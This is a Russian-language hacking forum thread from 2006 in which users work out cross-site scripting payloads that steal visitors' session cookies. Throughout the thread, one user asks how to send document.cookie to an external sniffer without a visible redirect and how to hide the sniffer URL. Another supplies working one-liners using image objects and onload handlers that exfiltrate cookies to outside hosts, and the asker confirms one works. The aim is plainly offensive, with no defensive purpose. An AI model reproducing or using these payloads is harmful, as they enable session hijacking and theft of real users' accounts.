HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Функции с xss
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Функции с xss
  #1  
Старый 07.05.2006, 02:44
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
С нами: 10586033

Репутация: 1
По умолчанию Функции с xss
onload='document.location="http://xss.ru/coc.gif?;"+document.cookie'
этот использует функцию onload
также можно
onmouseover
onmoseout
onerror
и т.д
Но проблема со всеми то что, как страница открывается или когда наводишь курсор на картинку то браузер переходит на страницу которую указал в document.location
Как сделать так, чтобы оставалась таже странице но - никуда не перебрасывало но http://xss.ru/coc.gif?;"+document.cookie срабатывало?
Также прочитал http://forum.antichat.ru/thread18719-xss.html
Пробовал закодировать свой http://xss.ru/coc.gif?;"+document.cookie
в base 64
aHR0cDovL3hzcy5ydS9jb2MuZ2lmPzsiK2RvY3VtZW50LmNvb2 tpZQ==
и когда это встовлял в
onload='document.location="aHR0cDovL3hzcy5ydS9jb2M uZ2lmPzsiK2RvY3VtZW50LmNvb2tpZQ=='
То сниффер не срабатывал.
Чем можно это закодировать, чтоб снифер работал, при этом ссылки сниффера видно не было?
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось alex-19841; 07.05.2006 в 02:46..
 
Ответить с цитированием

  #2  
Старый 07.05.2006, 04:14
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
С нами: 10652006

Репутация: 37
По умолчанию
Попробуй через картинку...
<script>
img = new Image()
img.src = "адресс_снифака"+document.cookie;
</script>

Цитата:
Чем можно это закодировать, чтоб снифер работал, при этом ссылки сниффера видно не было?
так ты не кодируй http:// и слеши тоже =))) И тогда все будет работать =)
 
Ответить с цитированием

  #3  
Старый 07.05.2006, 06:30
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
С нами: 10586033

Репутация: 1
По умолчанию
Script не могу использовать - фильтруется.
Пробовал закодировать
http://xss.ru/coc.gif?;"+document.cookie в
http://eHNzLnJ1/Y29jLmdpZg==?;"+ZG9jdW1lbnQuY29va2ll
Не пашет.
 
Ответить с цитированием

  #4  
Старый 07.05.2006, 06:37
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
С нами: 10586033

Репутация: 1
По умолчанию
P.s
Кто чем кодирует и как?
 
Ответить с цитированием

  #5  
Старый 07.05.2006, 09:13
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
С нами: 10586033

Репутация: 1
По умолчанию
Все с проблемой вылета новой страници разобрался, осталось кодировка
 
Ответить с цитированием

  #6  
Старый 14.05.2006, 13:04
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
С нами: 10586033

Репутация: 1
По умолчанию
Помогите очень, очень надо
(javascript:document.location='http://site.ru/snf.gif?;'+document.cookie)
Открывается в новом окне, как сделать чтоб это срабатывало как картинка и не перескакивало на другую страницу
чета типо
(javascript:image.src='http://site.ru/snf.gif?;'+document.cookie) - только это не работает
Зарание благодарен.
 
Ответить с цитированием

  #7  
Старый 14.05.2006, 13:16
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
С нами: 10652006

Репутация: 37
По умолчанию
Код:
(javascript:img=new Image();img.src="http://site.ru/snf.gif?"+document.cookie)
 
Ответить с цитированием

  #8  
Старый 14.05.2006, 13:42
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
С нами: 10586033

Репутация: 1
По умолчанию
CinerX
Не срабатыват
 
Ответить с цитированием

  #9  
Старый 14.05.2006, 14:15
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
С нами: 10652006

Репутация: 37
По умолчанию
Хм... странно...
поробуй тогда так:
Код:
javascript:img=new%20Image();img.src="http://site.ru/snf.gif?"+document.cookie
И вот еще один пример, но он работает только в том случае если есть хоть одна картинка на странице в которую ты будешь совать снифер:
Код:
javascript:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie
 
Ответить с цитированием

  #10  
Старый 15.05.2006, 05:35
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
С нами: 10586033

Репутация: 1
По умолчанию
CinerX
+5
Цитата:
javascript:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie
Сработало.
Спасибо
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss на yandex.ru Pridu_ROCK Уязвимости 1 04.03.2006 01:08
XSS в Phorum<=5.0.14 tester2005 Уязвимости 22 17.03.2005 07:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.